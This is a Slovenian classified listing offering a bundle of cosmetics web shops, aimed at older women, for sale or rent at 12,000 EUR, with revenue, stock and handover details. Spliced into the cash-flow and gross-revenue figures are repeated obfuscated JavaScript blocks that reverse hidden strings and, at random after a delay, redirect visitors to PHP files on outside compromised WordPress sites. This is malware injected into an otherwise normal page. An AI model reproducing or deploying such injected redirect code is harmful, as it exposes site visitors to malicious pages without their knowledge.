Prodam paket spletnih trgovin z vso zalogo ZNIŽANO NA 12000€ NUJNO

 Spletna trgovina / Novo

12.000,00€

Predstavljamo vam priložnost za prevzem utečenih spletnih trgovin z kozmetiko. Spletne trgovine delujejo od leta 2018 in imajo postavljene trdne temelje, zgrajeno prepoznavnost in zaupanje med obstoječimi kupci, kar bo novemu lastniku omogočalo lažje vpeljevanje v posel.

Spletna trgovina je nišno usmerjena v prodajo kozmetike za starejše dame. Posel s konstantno rastjo prihodkov in možnostjo poslovanja iz domače pisarne je lahko odlična poslovna priložnost tako za posameznike, ki se želite podati na samostojno podjetniško pot, kot tudi za obstoječe podjetnike, ki se že ukvarjate s podobno dejavnostjo in bi želeli svoj posel dodatno razširiti.

Lastna baza strank, povezana skupnost na Facebooku in Instagramu. Kar 50 % kupcev je stalnih in se radi vračajo zaradi kakovosti blaga in odličnega customer servica, ki jim ga spletne trgovine nudijo. S strateškim in načrtno izvajanim marketingom ter spremljanjem analiz, nov lastnik lahko doseže nove kupce in proda več.

Prodajalec bo novemu lastniku po prevzemu na razpolago pri dobavi blaga in tehnični ureditvi trgovine. Po želji pa je pripravljen sodelovati tudi pri prenovi spletne trgovine.

Zakaj je prevzem posla dobra poslovna priložnost?

Širok portfelj kupcev
Zanesljivi in kakovostni dobavitelji
Inovativni in ekskluzivni nišni izdelki
Priložnosti za rast in izboljšave pri poslovanju
Možnost dela od doma in na daljavo
Zagotovljena podpora pri uvajanju v poslovanje
Kaj je razlog za prodajo
Bolezen v družini in zaradi tega moramo zmanjšati obseg projektov

Poprodajna podpora

Prodajalec je po sklenitvi kupoprodajne pogodbe pripravljen prevzemniku nuditi podporo pri prenosu poslovanja in sodelovati določen čas v skladu z dogovorom s prevzemnikom.
SPLETNE TRGOVINE SE LAHKO TUDI ODDAJO, kar pomeni da vam ni potrebno takoj odkupiti trgovine in s tem zmanjšate vstopne stroške v posel.

  • Listing ID: 2162
  • Vključuje: Certifikati, Blagovna znamka, Know-how, Dogovori s kupci, Dogovori z dobavitelji, Licence, Premičnine, Pogodbe, Zaloge, Spletna stran, Spletne skupine
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2018
  • Denarni <script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tok: 30000
  • Bru<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to prihodki: 50000
  • Zaloge (MPC): 8000
Contact details

6000 Show Phone Number *****

Contact this listing owner